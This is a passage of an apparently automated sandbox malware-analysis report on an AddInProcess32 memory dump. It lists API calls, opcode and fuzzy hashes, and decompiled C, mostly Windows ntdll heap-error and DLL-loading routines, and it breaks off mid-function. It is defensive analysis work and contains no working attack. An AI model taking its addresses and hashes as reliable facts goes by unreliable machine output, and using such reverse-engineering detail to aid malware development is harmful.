API String ID: 1279760036-0
Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
Instruction ID: 1388dd934f0a4cc284384f94e8c5a8998a3c4ae718bb400ef2b18055324356cd
Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
Instruction Fuzzy Hash: 95E046B5200218ABDB18EF9ADC45EE737ACEF88754F018159FE095B242C630F910CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E327 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F379,0040F379,?,00000000,?,?), ref: 0041E357

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
Instruction ID: c45f07e038ebfe2a057fbf399f056a184573bb7e02c84091132a971eb32c72bf
Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
Instruction Fuzzy Hash: DBE01AB52002186BD710DF49DC45EE737ADAF88654F118159BE0957242C630F810CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F527 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserGeoID.KERNELBASE(00000010), ref: 0040F551

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: User
String ID:
API String ID: 765557111-0
Opcode ID: 40bf48d4fd6e03cba57d132749fc158fbbb21c364b99c8ef44d233898b217c90
Instruction ID: 3a1d2ef0c60c757c0f72a0a3003fad6eb55e58fc730c6d937a84e79b7af20ed7
Opcode Fuzzy Hash: 40bf48d4fd6e03cba57d132749fc158fbbb21c364b99c8ef44d233898b217c90
Instruction Fuzzy Hash: 1FE0C23338030427F62095A98C42FB6328E5B84B04F048475F908E72C1D5A9E5805014

Uniqueness

Uniqueness Score: -1.00%

Function 0041E207 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,00000000,0000007F,?,?,00000001), ref: 0041E22F

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
Instruction ID: 13d1b6daedaff665116823a2b2046991a6a8e25442adef1dbb486679b8e7ea51
Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
Instruction Fuzzy Hash: 5CD0C2312002187BC620DF89CC45FD3379CDF44794F004065BA0C5B242C530BA00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0189967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01899694

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68e37210a248f7e47eb25779bd2a856c05e54f147b8173ac2bf0c5b2f056e3df
Instruction ID: e48739a22af62c0aaf6cd864691d8f6d037cb7ba095cc594a1dfd425c1d19496
Opcode Fuzzy Hash: 68e37210a248f7e47eb25779bd2a856c05e54f147b8173ac2bf0c5b2f056e3df
Instruction Fuzzy Hash: A8B02B71C010C0C6EB02D3A40608717390077C0300F57C011D2028380B4738C180F1F1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0190B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

*** enter .exr %p for the exception record, xrefs: 0190B4F1
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0190B2F3
write to, xrefs: 0190B4A6
a NULL pointer, xrefs: 0190B4E0
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0190B47D
The resource is owned shared by %d threads, xrefs: 0190B37E
*** Inpage error in %ws:%s, xrefs: 0190B418
*** then kb to get the faulting stack, xrefs: 0190B51C
The instruction at %p tried to %s , xrefs: 0190B4B6
The resource is owned exclusively by thread %p, xrefs: 0190B374
*** enter .cxr %p for the context, xrefs: 0190B50D
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0190B2DC
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0190B39B
Go determine why that thread has not released the critical section., xrefs: 0190B3C5
*** An Access Violation occurred in %ws:%s, xrefs: 0190B48F
*** Resource timeout (%p) in %ws:%s, xrefs: 0190B352
The critical section is owned by thread %p., xrefs: 0190B3B9
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0190B38F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0190B484
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0190B314
This failed because of error %Ix., xrefs: 0190B446
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0190B323
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0190B305
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0190B476
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0190B53F
The instruction at %p referenced memory at %p., xrefs: 0190B432
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0190B3D6
<unknown>, xrefs: 0190B27E, 0190B2D1, 0190B350, 0190B399, 0190B417, 0190B48E
an invalid address, %p, xrefs: 0190B4CF
read from, xrefs: 0190B4AD, 0190B4B2

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 165f4816d0c61b0714a3cfe01cd674581e0761b471b02fbfc354eda5b011e948
Instruction ID: 6b31eb8dfdf6aa66a25d02b234260b83c8a6cb25fa1125f21846fa1f25cebcde
Opcode Fuzzy Hash: 165f4816d0c61b0714a3cfe01cd674581e0761b471b02fbfc354eda5b011e948
Instruction Fuzzy Hash: 3481387DA80200FFDB225B4E8C89D6B3BA9EF67B56F410048F5099B292D6698711C772

Uniqueness

Uniqueness Score: -1.00%

Function 01911C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01911C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x18348a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0185B150();
				} else {
					E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x194589c);
				E0185B150("Heap error detected at %p (heap handle %p)\n",  *0x19458a0);
				_t27 =  *0x1945898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01911E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0185B150();
				} else {
					E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0185B150("Error code: %d - %s\n",  *0x1945898);
				_t113 =  *0x19458a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0185B150();
					} else {
						E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0185B150("Parameter1: %p\n",  *0x19458a4);
				}
				_t115 =  *0x19458a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0185B150();
					} else {
						E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0185B150("Parameter2: %p\n",  *0x19458a8);
				}
				_t117 =  *0x19458ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0185B150();
					} else {
						E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0185B150("Parameter3: %p\n",  *0x19458ac);
				}
				_t119 =  *0x19458b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0185B150();
					} else {
						E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x19458b4);
					E0185B150("Last known valid blocks: before - %p, after - %p\n",  *0x19458b0);
				} else {
					_t120 =  *0x19458b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0185B150();
				} else {
					E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0185B150("Stack trace available at %p\n", 0x19458c0);
			}

0x01911c10
0x01911c16
0x01911c1e
0x01911c3d
0x01911c3e
0x01911c20
0x01911c35
0x01911c3a
0x01911c44
0x01911c55
0x01911c5a
0x01911c65
0x01911c67
0x00000000
0x01911c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01911c67
0x01911cdc
0x01911ce5
0x01911d04
0x01911d05
0x01911ce7
0x01911cfc
0x01911d01
0x01911d0b
0x01911d17
0x01911d1f
0x01911d25
0x01911d30
0x01911d4f
0x01911d50
0x01911d32
0x01911d47
0x01911d4c
0x01911d61
0x01911d67
0x01911d68
0x01911d6e
0x01911d79
0x01911d98
0x01911d99
0x01911d7b
0x01911d90
0x01911d95
0x01911daa
0x01911db0
0x01911db1
0x01911db7
0x01911dc2
0x01911de1
0x01911de2
0x01911dc4
0x01911dd9
0x01911dde
0x01911df3
0x01911df9
0x01911dfa
0x01911e00
0x01911e0a
0x01911e13
0x01911e32
0x01911e33
0x01911e15
0x01911e2a
0x01911e2f
0x01911e39
0x01911e4a
0x01911e02
0x01911e02
0x01911e08
0x00000000
0x00000000
0x01911e08
0x01911e5b
0x01911e7a
0x01911e7b
0x01911e5d
0x01911e72
0x01911e77
0x01911e95

Strings

heap_failure_usage_after_free, xrefs: 01911CBB
heap_failure_unknown, xrefs: 01911C75
Error code: %d - %s, xrefs: 01911D12
Parameter1: %p, xrefs: 01911D5C
heap_failure_generic, xrefs: 01911C7C
heap_failure_cross_heap_operation, xrefs: 01911CC2
heap_failure_buffer_underrun, xrefs: 01911C9F
heap_failure_listentry_corruption, xrefs: 01911CD0
Heap error detected at %p (heap handle %p), xrefs: 01911C50
Parameter2: %p, xrefs: 01911DA5
heap_failure_multiple_entries_corruption, xrefs: 01911C8A
Last known valid blocks: before - %p, after - %p, xrefs: 01911E45
heap_failure_entry_corruption, xrefs: 01911C83
heap_failure_block_not_busy, xrefs: 01911CA6
heap_failure_freelists_corruption, xrefs: 01911CC9
heap_failure_invalid_allocation_type, xrefs: 01911CB4
heap_failure_lfh_bitmap_mismatch, xrefs: 01911CD7
heap_failure_internal, xrefs: 01911C6E
heap_failure_invalid_argument, xrefs: 01911CAD
HEAP: , xrefs: 01911C16, 01911C3D, 01911D04, 01911D4F, 01911D98, 01911DE1, 01911E32, 01911E7A
heap_failure_virtual_block_corruption, xrefs: 01911C91
heap_failure_buffer_overrun, xrefs: 01911C98
HEAP[%wZ]: , xrefs: 01911C30, 01911CF7, 01911D42, 01911D8B, 01911DD4, 01911E25, 01911E6D
Stack trace available at %p, xrefs: 01911E86
Parameter3: %p, xrefs: 01911DEE

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 43eb9dbe8c6884e049d647964848cde52493e6b2e2fc4ee4c39d4ff7e1b15f11
Instruction ID: cc3665d99f8cfb697f96a62f1d8a7168a74a298f8da7d5161c853befbea62480
Opcode Fuzzy Hash: 43eb9dbe8c6884e049d647964848cde52493e6b2e2fc4ee4c39d4ff7e1b15f11
Instruction Fuzzy Hash: 5661E63695554DEFE791ABADD484D2073A5F710B21B0A807AFB0DDB344DA289E80CF4B

Uniqueness

Uniqueness Score: -1.00%

Function 01888E00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E01888E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x194d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1948464; // 0x74cc0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1945780 & 0x00000003) != 0) {
							E018D5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1945780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0189B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1947984; // 0x12e2ba0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1948464; // 0x74cc0110
					 *0x194b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01889B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1945780 & 0x00000005) != 0) {
						_push(_t49);
						E018D5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01888e0f
0x01888e16
0x01888e19
0x01888e1b
0x01888e21
0x01888e7f
0x01888e85
0x018c9354
0x018c936c
0x018c9371
0x018c937b
0x018c9381
0x018c9381
0x018c937b
0x01888e9d
0x01888e9d
0x01888e29
0x01888e2c
0x01888e38
0x01888e3e
0x01888e43
0x01888eb5
0x01888eb9
0x018c92aa
0x018c92af
0x018c92e8
0x018c92e8
0x018c92af
0x01888eb9
0x01888e45
0x01888e53
0x01888e5b
0x01888e5f
0x01888e78
0x01888e78
0x01888e7d
0x01888ec3
0x01888ecd
0x01888ed2
0x01888ed2
0x01888ec5
0x01888ec5
0x00000000
0x01888e7d
0x01888e67
0x01888ea4
0x018c931a
0x00000000
0x00000000
0x018c9320
0x01888ea4
0x01888e70
0x018c9325
0x018c9340
0x018c9345
0x018c9345
0x01888e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01888E53

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 018C933B, 018C9367
LdrpFindDllActivationContext, xrefs: 018C9331, 018C935D
Querying the active activation context failed with status 0x%08lx, xrefs: 018C9357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 018C932A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 16cd0d8cfd4e82ef9f1c071ce9329592939bed5a7019714c9bbc3ee6d1a846bf
Instruction ID: 7d8b01a5da9d55cc5e134441712f2922a49b75d4a4cc2759b499ca9e8a1138c0
Opcode Fuzzy Hash: 16cd0d8cfd4e82ef9f1c071ce9329592939bed5a7019714c9bbc3ee6d1a846bf
Instruction Fuzzy Hash: 23410931A407199FEB36BB5CC888E35B7B5AB46758F8A4169E904D71D1E770AF80C3C1

Uniqueness

Uniqueness Score: -1.00%

Function 01863D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01863D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01861B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01861B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01861B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01861B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01861B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01874620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0189F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E018A1370(_t276, 0x1834e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0189BB40(0,  &_v68, _t170);
									if(L018643C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0189BB40(_t257,  &_v68, _t243);
								if(L018643C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E018A1370(_t278, 0x1834e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01874620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0189F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E018A1370(_v16, 0x1834e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0189BB40(_t262,  &_v68, _t244);
								if(L018643C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E018A1370(_t282, 0x1834e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0189BB40(_t262,  &_v68, _t201);
							if(L018643C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01874620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0189F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E018A1370(_t280, 0x1834e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0189BB40(_t267,  &_v68, _t245);
							if(L018643C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E018A1370(_t284, 0x1834e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0189BB40(_t267,  &_v68, _t224);
						if(L018643C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
